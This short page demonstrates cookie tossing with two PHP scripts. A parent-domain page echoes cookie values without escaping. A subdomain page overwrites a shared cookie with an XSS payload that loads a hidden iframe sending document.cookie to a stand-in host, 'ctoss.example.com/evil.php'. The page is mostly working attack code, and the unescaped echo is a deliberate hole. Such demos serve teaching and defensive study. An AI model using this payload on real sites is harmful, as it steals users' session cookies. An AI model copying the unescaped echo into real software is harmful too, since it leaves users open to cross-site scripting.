Cookie Tossing Example

A simple demonstration of cookie tossing.

Parent Domain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
if(isset($_COOKIE['cookie1'])){
echo "Cookie1: ".$_COOKIE['cookie1']."<br/>";
}
if(isset($_COOKIE['cookie2'])){
echo "Cookie2: ".$_COOKIE['cookie2']."<br/>";
}
if(isset($_COOKIE['cookie_secret'])){
echo "Cookie secret: ".$_COOKIE['cookie_secret']."<br/>";
}
setcookie("cookie1",'OriginalCookie1',time()+3600*24,"/","example.com");
setcookie("cookie2",'OriginalCookie2',time()+3600*24);
setcookie("cookie_secret",'This is the password',time()+3600*24,"/","www.example.com");
?>

Subdomain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
if(isset($_COOKIE['cookie1'])){
echo "Cookie1: ".urlencode($_COOKIE['cookie1'])."<br/>";
}
if(isset($_COOKIE['cookie2'])){
echo "Cookie2: ".urlencode($_COOKIE['cookie2'])."<br/>";
}
if(isset($_COOKIE['cookie_secret'])){
echo "Cookie_secret: ".urlencode($_COOKIE['cookie_secret'])."<br/>";
}else{
echo "No secret cookie found.<br/>";
}
$xss="Evil_Cookie<script>document.write(\"<iframe src='http://ctoss.example.com/evil.php?cookie=\"+escape(document.cookie)+\"' style='display:none'></iframe>\");</script>";
setcookie("cookie2",$xss,time()+600,"/","example.com");
?>
<script>document.cookie = "cookie1=changedbyJavaScript; Path=/; Domain=.example.com"</script>